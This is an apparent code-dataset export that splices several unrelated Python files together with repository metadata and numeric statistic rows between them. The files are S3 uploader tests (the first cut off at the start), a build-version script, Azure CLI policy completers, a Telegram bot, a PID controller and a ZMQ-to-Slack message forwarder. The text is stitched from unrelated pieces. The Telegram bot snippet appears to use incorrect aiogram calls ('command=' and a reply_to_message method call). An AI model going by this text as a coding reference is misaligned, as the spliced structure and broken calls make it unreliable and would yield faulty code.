"https://marc.s3.us-east-2.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
"us-east-2",
),
(
"with_http_bucket_and_end_time_and_start_time",
"http://marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"http://marc/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
),
(
"with_https_bucket_and_end_time_and_start_time",
"https://marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"https://marc/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
),
]
)
def test_marc_file_url(
self,
name,
bucket,
library_name,
lane_name,
end_time,
expected_result,
start_time=None,
region=None,
):
# Arrange
library = self._library(short_name=library_name)
lane = self._lane(display_name=lane_name)
buckets = {S3UploaderConfiguration.MARC_BUCKET_KEY: bucket}
uploader = self._create_s3_uploader(region=region, **buckets)
# Act
result = uploader.marc_file_url(library, lane, end_time, start_time)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"s3_path_style_request_without_region",
"https://s3.amazonaws.com/bucket/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_path_style_request_with_region",
"https://s3.us-east-2.amazonaws.com/bucket/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_virtual_hosted_style_request_with_global_endpoint",
"https://bucket.s3.amazonaws.com/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_virtual_hosted_style_request_with_dashed_region",
"https://bucket.s3-us-east-2.amazonaws.com/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_virtual_hosted_style_request_with_dotted_region",
"https://bucket.s3.us-east-2.amazonaws.com/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"http_url",
"http://book-covers.nypl.org/directory/filename.jpg",
("book-covers.nypl.org", "directory/filename.jpg"),
),
(
"https_url",
"https://book-covers.nypl.org/directory/filename.jpg",
("book-covers.nypl.org", "directory/filename.jpg"),
),
(
"http_url_with_escaped_symbols",
"http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg",
("book-covers.nypl.org", "directory/filename with spaces!.jpg"),
),
(
"http_url_with_escaped_symbols_but_unquote_set_to_false",
"http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg",
("book-covers.nypl.org", "directory/filename+with+spaces%21.jpg"),
False,
),
]
)
def test_split_url(self, name, url, expected_result, unquote=True):
# Arrange
s3_uploader = self._create_s3_uploader()
# Act
result = s3_uploader.split_url(url, unquote)
# Assert
assert result == expected_result
def test_mirror_one(self):
edition, pool = self._edition(with_license_pool=True)
original_cover_location = "http://example.com/a-cover.png"
content = open(self.sample_cover_path("test-book-cover.png"), "rb").read()
cover, ignore = pool.add_link(
Hyperlink.IMAGE,
original_cover_location,
edition.data_source,
Representation.PNG_MEDIA_TYPE,
content=content,
)
cover_rep = cover.resource.representation
assert None == cover_rep.mirrored_at
original_epub_location = "https://books.com/a-book.epub"
epub, ignore = pool.add_link(
Hyperlink.OPEN_ACCESS_DOWNLOAD,
original_epub_location,
edition.data_source,
Representation.EPUB_MEDIA_TYPE,
content="i'm an epub",
)
epub_rep = epub.resource.representation
assert None == epub_rep.mirrored_at
s3 = self._create_s3_uploader(client_class=MockS3Client)
# Mock final_mirror_url so we can verify that it's called with
# the right arguments
def mock_final_mirror_url(bucket, key):
return "final_mirror_url was called with bucket %s, key %s" % (bucket, key)
s3.final_mirror_url = mock_final_mirror_url
book_url = "http://books-go/here.epub"
cover_url = "http://s3.amazonaws.com/covers-go/here.png"
s3.mirror_one(cover.resource.representation, cover_url)
s3.mirror_one(epub.resource.representation, book_url)
[
[data1, bucket1, key1, args1, ignore1],
[data2, bucket2, key2, args2, ignore2],
] = s3.client.uploads
# Both representations have had .mirror_url set and been
# mirrored to those URLs.
assert data1.startswith(b"\x89")
assert "covers-go" == bucket1
assert "here.png" == key1
assert Representation.PNG_MEDIA_TYPE == args1["ContentType"]
assert (utc_now() - cover_rep.mirrored_at).seconds < 10
assert b"i'm an epub" == data2
assert "books-go" == bucket2
assert "here.epub" == key2
assert Representation.EPUB_MEDIA_TYPE == args2["ContentType"]
# In both cases, mirror_url was set to the result of final_mirror_url.
assert (
"final_mirror_url was called with bucket books-go, key here.epub"
== epub_rep.mirror_url
)
assert (
"final_mirror_url was called with bucket covers-go, key here.png"
== cover_rep.mirror_url
)
# mirrored-at was set when the representation was 'mirrored'
for rep in epub_rep, cover_rep:
assert (utc_now() - rep.mirrored_at).seconds < 10
def test_mirror_failure(self):
edition, pool = self._edition(with_license_pool=True)
original_epub_location = "https://books.com/a-book.epub"
epub, ignore = pool.add_link(
Hyperlink.OPEN_ACCESS_DOWNLOAD,
original_epub_location,
edition.data_source,
Representation.EPUB_MEDIA_TYPE,
content="i'm an epub",
)
epub_rep = epub.resource.representation
uploader = self._create_s3_uploader(MockS3Client)
# A network failure is treated as a transient error.
uploader.client.fail_with = BotoCoreError()
uploader.mirror_one(epub_rep, self._url)
assert None == epub_rep.mirrored_at
assert None == epub_rep.mirror_exception
# An S3 credential failure is treated as a transient error.
response = dict(
Error=dict(
Code=401,
Message="Bad credentials",
)
)
uploader.client.fail_with = ClientError(response, "SomeOperation")
uploader.mirror_one(epub_rep, self._url)
assert None == epub_rep.mirrored_at
assert None == epub_rep.mirror_exception
# Because the file was not successfully uploaded,
# final_mirror_url was never called and mirror_url is
# was not set.
assert None == epub_rep.mirror_url
# A bug in the code is not treated as a transient error --
# the exception propagates through.
uploader.client.fail_with = Exception("crash!")
pytest.raises(Exception, uploader.mirror_one, epub_rep, self._url)
def test_svg_mirroring(self):
edition, pool = self._edition(with_license_pool=True)
original = self._url
# Create an SVG cover for the book.
svg = """<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="50">
<ellipse cx="50" cy="25" rx="50" ry="25" style="fill:blue;"/>
</svg>"""
hyperlink, ignore = pool.add_link(
Hyperlink.IMAGE,
original,
edition.data_source,
Representation.SVG_MEDIA_TYPE,
content=svg,
)
# 'Upload' it to S3.
s3 = self._create_s3_uploader(MockS3Client)
s3.mirror_one(hyperlink.resource.representation, self._url)
[[data, bucket, key, args, ignore]] = s3.client.uploads
assert Representation.SVG_MEDIA_TYPE == args["ContentType"]
assert b"svg" in data
assert b"PNG" not in data
def test_multipart_upload(self):
class MockMultipartS3Upload(MultipartS3Upload):
completed = None
aborted = None
def __init__(self, uploader, representation, mirror_to):
self.parts = []
MockMultipartS3Upload.completed = False
MockMultipartS3Upload.aborted = False
def upload_part(self, content):
self.parts.append(content)
def complete(self):
MockMultipartS3Upload.completed = True
def abort(self):
MockMultipartS3Upload.aborted = True
rep, ignore = create(
self._db,
Representation,
url="http://books.mrc",
media_type=Representation.MARC_MEDIA_TYPE,
)
s3 = self._create_s3_uploader(MockS3Client)
# Successful upload
with s3.multipart_upload(
rep, rep.url, upload_class=MockMultipartS3Upload
) as upload:
assert [] == upload.parts
assert False == upload.completed
assert False == upload.aborted
upload.upload_part("Part 1")
upload.upload_part("Part 2")
assert ["Part 1", "Part 2"] == upload.parts
assert True == MockMultipartS3Upload.completed
assert False == MockMultipartS3Upload.aborted
assert None == rep.mirror_exception
class FailingMultipartS3Upload(MockMultipartS3Upload):
def upload_part(self, content):
raise Exception("Error!")
# Failed during upload
with s3.multipart_upload(
rep, rep.url, upload_class=FailingMultipartS3Upload
) as upload:
upload.upload_part("Part 1")
assert False == MockMultipartS3Upload.completed
assert True == MockMultipartS3Upload.aborted
assert "Error!" == rep.mirror_exception
class AnotherFailingMultipartS3Upload(MockMultipartS3Upload):
def complete(self):
raise Exception("Error!")
rep.mirror_exception = None
# Failed during completion
with s3.multipart_upload(
rep, rep.url, upload_class=AnotherFailingMultipartS3Upload
) as upload:
upload.upload_part("Part 1")
assert False == MockMultipartS3Upload.completed
assert True == MockMultipartS3Upload.aborted
assert "Error!" == rep.mirror_exception
@parameterized.expand(
[
(
"default_expiration_parameter",
None,
int(S3UploaderConfiguration.S3_DEFAULT_PRESIGNED_URL_EXPIRATION),
),
(
"empty_expiration_parameter",
{S3UploaderConfiguration.S3_PRESIGNED_URL_EXPIRATION: 100},
100,
),
]
)
def test_sign_url(self, name, expiration_settings, expected_expiration):
# Arrange
region = "us-east-1"
bucket = "bucket"
filename = "filename"
url = "https://{0}.s3.{1}.amazonaws.com/{2}".format(bucket, region, filename)
expected_url = url + "?AWSAccessKeyId=KEY&Expires=1&Signature=S"
settings = expiration_settings if expiration_settings else {}
s3_uploader = self._create_s3_uploader(region=region, **settings)
s3_uploader.split_url = MagicMock(return_value=(bucket, filename))
s3_uploader.client.generate_presigned_url = MagicMock(return_value=expected_url)
# Act
result = s3_uploader.sign_url(url)
# Assert
assert result == expected_url
s3_uploader.split_url.assert_called_once_with(url)
s3_uploader.client.generate_presigned_url.assert_called_once_with(
"get_object",
ExpiresIn=expected_expiration,
Params={"Bucket": bucket, "Key": filename},
)
class TestMultiPartS3Upload(S3UploaderTest):
def _representation(self):
rep, ignore = create(
self._db,
Representation,
url="http://bucket/books.mrc",
media_type=Representation.MARC_MEDIA_TYPE,
)
return rep
def test_init(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
assert uploader == upload.uploader
assert rep == upload.representation
assert "bucket" == upload.bucket
assert "books.mrc" == upload.filename
assert 1 == upload.part_number
assert [] == upload.parts
assert 1 == upload.upload.get("UploadId")
uploader.client.fail_with = Exception("Error!")
pytest.raises(Exception, MultipartS3Upload, uploader, rep, rep.url)
def test_upload_part(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
upload.upload_part("Part 1")
upload.upload_part("Part 2")
assert [
{
"Body": "Part 1",
"UploadId": 1,
"PartNumber": 1,
"Bucket": "bucket",
"Key": "books.mrc",
},
{
"Body": "Part 2",
"UploadId": 1,
"PartNumber": 2,
"Bucket": "bucket",
"Key": "books.mrc",
},
] == uploader.client.parts
assert 3 == upload.part_number
assert [
{"ETag": "etag", "PartNumber": 1},
{"ETag": "etag", "PartNumber": 2},
] == upload.parts
uploader.client.fail_with = Exception("Error!")
pytest.raises(Exception, upload.upload_part, "Part 3")
def test_complete(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
upload.upload_part("Part 1")
upload.upload_part("Part 2")
upload.complete()
assert [
{
"Bucket": "bucket",
"Key": "books.mrc",
"UploadId": 1,
"MultipartUpload": {
"Parts": [
{"ETag": "etag", "PartNumber": 1},
{"ETag": "etag", "PartNumber": 2},
],
},
}
] == uploader.client.uploads
def test_abort(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
upload.upload_part("Part 1")
upload.upload_part("Part 2")
upload.abort()
assert [] == uploader.client.parts
@pytest.mark.minio
class TestS3UploaderIntegration(S3UploaderIntegrationTest):
@parameterized.expand(
[
(
"using_s3_uploader_and_open_access_bucket",
functools.partial(
S3Uploader,
host=S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST,
),
S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY,
"test-bucket",
True,
),
(
"using_s3_uploader_and_protected_access_bucket",
functools.partial(
S3Uploader,
host=S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST,
),
S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY,
"test-bucket",
False,
),
(
"using_minio_uploader_and_open_access_bucket",
MinIOUploader,
S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY,
"test-bucket",
True,
{
MinIOUploaderConfiguration.ENDPOINT_URL: S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL
},
),
(
"using_minio_uploader_and_protected_access_bucket",
MinIOUploader,
S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY,
"test-bucket",
False,
{
MinIOUploaderConfiguration.ENDPOINT_URL: S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL
},
),
]
)
def test_mirror(
self, name, uploader_class, bucket_type, bucket_name, open_access, settings=None
):
# Arrange
book_title = "1234567890"
book_content = "1234567890"
identifier = Identifier(type=Identifier.ISBN, identifier=book_title)
representation = Representation(
content=book_content, media_type=Representation.EPUB_MEDIA_TYPE
)
buckets = {
bucket_type: bucket_name,
}
if settings:
settings.update(buckets)
else:
settings = buckets
s3_uploader = self._create_s3_uploader(
uploader_class=uploader_class, **settings
)
self.minio_s3_client.create_bucket(Bucket=bucket_name)
# Act
book_url = s3_uploader.book_url(identifier, open_access=open_access)
s3_uploader.mirror_one(representation, book_url)
# Assert
response = self.minio_s3_client.list_objects(Bucket=bucket_name)
assert "Contents" in response
assert len(response["Contents"]) == 1
[object] = response["Contents"]
assert object["Key"] == "ISBN/{0}.epub".format(book_title)
| 35.105572
| 145
| 0.56497
| 4,787
| 47,884
| 5.406727
| 0.096094
| 0.021791
| 0.014605
| 0.016227
| 0.585117
| 0.53346
| 0.498725
| 0.458852
| 0.405301
| 0.373657
| 0
| 0.027131
| 0.334934
| 47,884
| 1,363
| 146
| 35.131328
| 0.785593
| 0.074597
| 0
| 0.456779
| 0
| 0.030027
| 0.210576
| 0.063339
| 0
| 0
| 0
| 0
| 0.075523
| 1
| 0.035487
| false
| 0.010009
| 0.012739
| 0.00091
| 0.065514
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1382e742de1eb49e756dcd17000e8fccc4bc6d6c
| 1,114
|
py
|
Python
|
lbry/scripts/set_build.py
|
vanshdevgan/lbry-sdk
|
3624a3b450945235edcf76971e18c898fba67455
|
[
"MIT"
] | null | null | null |
lbry/scripts/set_build.py
|
vanshdevgan/lbry-sdk
|
3624a3b450945235edcf76971e18c898fba67455
|
[
"MIT"
] | null | null | null |
lbry/scripts/set_build.py
|
vanshdevgan/lbry-sdk
|
3624a3b450945235edcf76971e18c898fba67455
|
[
"MIT"
] | null | null | null |
"""Set the build version to be 'qa', 'rc', 'release'"""
import sys
import os
import re
import logging
log = logging.getLogger()
log.addHandler(logging.StreamHandler())
log.setLevel(logging.DEBUG)
def get_build_type(travis_tag=None):
if not travis_tag:
return "qa"
log.debug("getting build type for tag: \"%s\"", travis_tag)
if re.match(r'v\d+\.\d+\.\d+rc\d+$', travis_tag):
return 'rc'
elif re.match(r'v\d+\.\d+\.\d+$', travis_tag):
return 'release'
return 'qa'
def main():
root_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
build_type_path = os.path.join(root_dir, 'lbry', 'build_type.py')
log.debug("configuring build type file: %s", build_type_path)
travis_commit = os.environ['TRAVIS_COMMIT'][:6]
build_type = get_build_type(os.environ.get('TRAVIS_TAG', None))
log.debug("setting build type=%s, build commit=%s", build_type, travis_commit)
with open(build_type_path, 'w') as f:
f.write(f"BUILD = \"{build_type}\"\nBUILD_COMMIT = \"{travis_commit}\"\n")
if __name__ == '__main__':
sys.exit(main())
| 30.108108
| 82
| 0.658887
| 171
| 1,114
| 4.064327
| 0.362573
| 0.155396
| 0.064748
| 0.025899
| 0.080576
| 0.034532
| 0.034532
| 0
| 0
| 0
| 0
| 0.001076
| 0.166068
| 1,114
| 36
| 83
| 30.944444
| 0.74704
| 0.043986
| 0
| 0
| 0
| 0
| 0.21152
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.148148
| 0
| 0.37037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1383ee1f9bdf4c8acf135f0e8788f23793efa056
| 1,627
|
py
|
Python
|
src/azure-cli/azure/cli/command_modules/policyinsights/_completers.py
|
YuanyuanNi/azure-cli
|
63844964374858bfacd209bfe1b69eb456bd64ca
|
[
"MIT"
] | 3,287
|
2016-07-26T17:34:33.000Z
|
2022-03-31T09:52:13.000Z
|
src/azure-cli/azure/cli/command_modules/policyinsights/_completers.py
|
YuanyuanNi/azure-cli
|
63844964374858bfacd209bfe1b69eb456bd64ca
|
[
"MIT"
] | 19,206
|
2016-07-26T07:04:42.000Z
|
2022-03-31T23:57:09.000Z
|
src/azure-cli/azure/cli/command_modules/policyinsights/_completers.py
|
YuanyuanNi/azure-cli
|
63844964374858bfacd209bfe1b69eb456bd64ca
|
[
"MIT"
] | 2,575
|
2016-07-26T06:44:40.000Z
|
2022-03-31T22:56:06.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.decorators import Completer
from azure.cli.core.commands.client_factory import get_subscription_id
from ._client_factory import cf_policy_insights
@Completer
def get_policy_remediation_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument
client = cf_policy_insights(cmd.cli_ctx)
sub = get_subscription_id(cmd.cli_ctx)
rg = getattr(namespace, 'resource_group_name', None)
management_group = getattr(namespace, 'management_group_name', None)
if rg:
result = client.remediations.list_for_resource_group(subscription_id=sub, resource_group_name=rg)
elif management_group:
result = client.remediations.list_for_management_group(management_group_id=management_group)
else:
result = client.remediations.list_for_subscription(subscription_id=sub)
return [i.name for i in result]
@Completer
def get_policy_metadata_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument
client = cf_policy_insights(cmd.cli_ctx).policy_metadata
from azure.mgmt.policyinsights.models import QueryOptions
query_options = QueryOptions(top=2000)
return [metadata.name for metadata in client.list(query_options) if metadata.name.startswith(prefix)]
| 45.194444
| 112
| 0.696374
| 190
| 1,627
| 5.710526
| 0.384211
| 0.082949
| 0.04424
| 0.077419
| 0.262673
| 0.176959
| 0.176959
| 0.176959
| 0.176959
| 0.176959
| 0
| 0.002793
| 0.119852
| 1,627
| 35
| 113
| 46.485714
| 0.754888
| 0.245851
| 0
| 0.090909
| 0
| 0
| 0.032787
| 0.017213
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.181818
| 0
| 0.363636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13844a293f37e75b2bbbb1208093a4013b133018
| 646
|
py
|
Python
|
Bot Telegram.py
|
devilnotcry77/devil_not_cry
|
a9d342d053c788ec6db2d1c5967ed55104b40045
|
[
"Apache-2.0"
] | null | null | null |
Bot Telegram.py
|
devilnotcry77/devil_not_cry
|
a9d342d053c788ec6db2d1c5967ed55104b40045
|
[
"Apache-2.0"
] | null | null | null |
Bot Telegram.py
|
devilnotcry77/devil_not_cry
|
a9d342d053c788ec6db2d1c5967ed55104b40045
|
[
"Apache-2.0"
] | null | null | null |
from aiogram import Bot, types
from aiogram.dispatcher import Dispatcher
from aiogram.utils import executor
TOKEN = "Token for you bot"
bot = Bot(token=TOKEN)
dp = Dispatcher(bot)
@dp.message_handler(command=['start', 'help'])
async def send_welcome(msg: types.Message):
await msg.reply_to_message(f'Добро пожаловать,{msg.from_user.first_name}')
@dp.message_handler(content_types=['text'])
async def get_text_messages(msg: types.Message):
if msg.text.lower() == 'привет':
await msg.answer('Привет!')
else:
await msg.answer('Я не понимаю')
if __name__ == '__main__':
executor.start_polling(dp)
| 32.3
| 79
| 0.704334
| 90
| 646
| 4.844444
| 0.5
| 0.075688
| 0.073395
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167183
| 646
| 20
| 80
| 32.3
| 0.810409
| 0
| 0
| 0
| 0
| 0
| 0.16879
| 0.058917
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.176471
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1385311ad77efabb909223d3edfa32108eab2458
| 4,984
|
py
|
Python
|
timedpid.py
|
DrGFreeman/PyTools
|
795e06b5a07f49a990df3c545d2d103b16dd8b4d
|
[
"MIT"
] | 1
|
2020-04-20T04:45:47.000Z
|
2020-04-20T04:45:47.000Z
|
timedpid.py
|
DrGFreeman/PyTools
|
795e06b5a07f49a990df3c545d2d103b16dd8b4d
|
[
"MIT"
] | null | null | null |
timedpid.py
|
DrGFreeman/PyTools
|
795e06b5a07f49a990df3c545d2d103b16dd8b4d
|
[
"MIT"
] | 1
|
2020-04-20T04:45:51.000Z
|
2020-04-20T04:45:51.000Z
|
# timedpid.py
# Source: https://github.com/DrGFreeman/PyTools
#
# MIT License
#
# Copyright (c) 2017 Julien de la Bruere-Terreault <drgfreeman@tuta.io>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This module defines a simple Proportional - Integral - Derivative (PID)
# controller with different time step calculation methods. This is a python
# implementation of my Arduino TimedPID library which can be found at
# https://github.com/DrGFreeman/TimedPID. Refer to this repository for detailed
# documentation.
import time
class TimedPID:
# Constructor
def __init__(self, kp = 1., ki = 0., kd = 0.):
self._kp = kp
self._ki = ki
self._kd = kd
self._cmdMin = None
self._cmdMax = None
self._boundRange = False
self._errorIntegral = 0.
self._errorPrevious = 0.
self._lastCmdTime = time.time()
def getCmd(self, setPoint, procVar):
"""Gets the PID command without time step.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled.
No time step is used (assumed = 1)."""
# Calculate error terms
error = setPoint - procVar
self._errorIntegral += error
errorDerivative = error - self._errorPrevious
# Set last error to current error
self._errorPrevious = error
# Calculate command
cmd = self._kp * error + self._ki * self._errorIntegral + \
self._kd * errorDerivative
# Return bound command
return self._boundCmd(cmd)
def getCmdAutoStep(self, setPoint, procVar):
"""Gets the PID command with automatic time step calculation.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled,
The time step is calculated as the time since the last call to the
method."""
# Calculate time step
currentTime = time.time()
timeStep = currentTime - self._lastCmdTime
# Set last time method was called to current time
self._lastCmdTime = currentTime
# Get command
return self.getCmdStep(setPoint, procVar, timeStep)
def getCmdStep(self, setPoint, procVar, timeStep):
"""Gets the PID command with a specified time step.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled,
timeStep is the time step."""
# Calculate error terms
error = setPoint - procVar
self._errorIntegral += (error + self._errorPrevious) / 2 * timeStep
errorDerivative = (error - self._errorPrevious) / timeStep
# Set last error to current error
self._errorPrevious = error
# Calculate command
cmd = self._kp * error + self._ki * self._errorIntegral + \
self._kd * errorDerivative
# Return bound command
return self._boundCmd(cmd)
def setCmdRange(self, cmdMin, cmdMax):
"""Sets the maximum command range. Commands calculated outside the
cmdMin and cmdMax will be set to cmdMin or cmdMax respectively."""
self._cmdMin = cmdMin
self._cmdMax = cmdMax
self._boundRange = True
def setGains(self, kp = 1., ki = 0., kd = 0.):
"""Sets the proportional, integral and derivative terms."""
self._kp = kp
self._ki = ki
self._kd = kd
def reset(self):
"""Resets the PID error terms and timer."""
self._errorIntegral = 0.
self._errorPrevious = 0.
self._lastCmdTime = time.time()
# Private methods
def _boundCmd(self, cmd):
"""Bounds the command within the range _cmdMin to _cmdMax."""
if self._boundRange:
if cmd < self._cmdMin:
cmd = self._cmdMin
elif cmd > self._cmdMax:
cmd = self._cmdMax
return cmd
| 36.647059
| 80
| 0.664125
| 626
| 4,984
| 5.209265
| 0.335463
| 0.026986
| 0.033732
| 0.015639
| 0.317081
| 0.309414
| 0.309414
| 0.279362
| 0.279362
| 0.227231
| 0
| 0.004374
| 0.266051
| 4,984
| 135
| 81
| 36.918519
| 0.887097
| 0.534912
| 0
| 0.423077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.019231
| 0
| 0.269231
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13863d63148372da4df5a7856bdd98b8b8e90e54
| 3,051
|
py
|
Python
|
pmon/zmq_responder.py
|
bernd-clemenz/pmon
|
8b61de4864ffed2d7ee224c283090ed1948533ae
|
[
"MIT"
] | 1
|
2020-06-01T19:20:09.000Z
|
2020-06-01T19:20:09.000Z
|
pmon/zmq_responder.py
|
bernd-clemenz/pmon
|
8b61de4864ffed2d7ee224c283090ed1948533ae
|
[
"MIT"
] | null | null | null |
pmon/zmq_responder.py
|
bernd-clemenz/pmon
|
8b61de4864ffed2d7ee224c283090ed1948533ae
|
[
"MIT"
] | null | null | null |
#
# -*- coding: utf-8-*-
# receives messages via zmq and executes some simple
# operations.
#
# (c) ISC Clemenz & Weinbrecht GmbH 2018
#
import json
import requests
import zmq
import pmon
class ZmqResponder(object):
context = None
socket = None
def __init__(self):
"""
Constructor.
"""
self.cfg = pmon.CFG
self.log = pmon.LOG
def __enter__(self):
self.bind()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
def bind(self):
self.log.info("Binding ZMQ")
port = self.cfg['pmon']['zmq.port']
bind_str = "tcp://*:{0}".format(port)
self.context = zmq.Context(1)
self.socket = self.context.socket(zmq.REP)
self.socket.bind(bind_str)
def done(self):
self.log.info("Disconnecting ZMQ")
if self.socket is not None:
self.socket.close()
if self.context is not None:
self.context.term()
def _read_message(self):
self.log.debug("Wait for incoming message")
msg = self.socket.recv()
_msg = msg.decode('utf-8')
return json.loads(_msg)
@staticmethod
def _make_slack_payload(message):
slack_payload = dict()
slack_payload['text'] = message['msg']
attachments = list()
slack_payload['attachments'] = attachments
attachment = dict()
attachment["fallback"] = message['msg']
attachment['text'] = message['msg']
attachment['title'] = message['msg.type']
attachment['author_name'] = message['from']
attachments.append(attachment)
return slack_payload
def _report_message_to_slack(self, message):
"""
Send a message to Slack Web-Hook.
:param message: the message record to be send to slack
:return: None
"""
self.log.debug("Forwarding message to slack")
url = self.cfg['pmon']['slack.hook']
payload = json.dumps(self._make_slack_payload(message))
headers = {'Accept': 'application/json',
'Content-Type': 'application/json',
'Content-Encoding': 'utf8',
'Content-Length': str(len(payload))}
try:
rsp = requests.post(url, data=payload, headers=headers)
if rsp.status_code != requests.codes.ok:
self.log.warn("problem sending to slack: {0}".format(rsp.status_code))
except Exception as x:
self.log.error(str(x))
def respond(self):
go_on = True
while go_on:
message = self._read_message()
self.log.debug("Message: {0}, {1}".format(message['msg.type'],
message['msg']))
self.socket.send_string('ACK')
try:
self._report_message_to_slack(message)
except Exception as x:
self.log.error(str(x))
go_on = True if message['msg'] != 'stop' else False
| 29.336538
| 86
| 0.561455
| 351
| 3,051
| 4.74359
| 0.37037
| 0.037838
| 0.033634
| 0.018018
| 0.040841
| 0.040841
| 0.040841
| 0.040841
| 0.040841
| 0
| 0
| 0.005722
| 0.312684
| 3,051
| 103
| 87
| 29.621359
| 0.788269
| 0.078663
| 0
| 0.083333
| 0
| 0
| 0.122903
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.055556
| 0
| 0.263889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
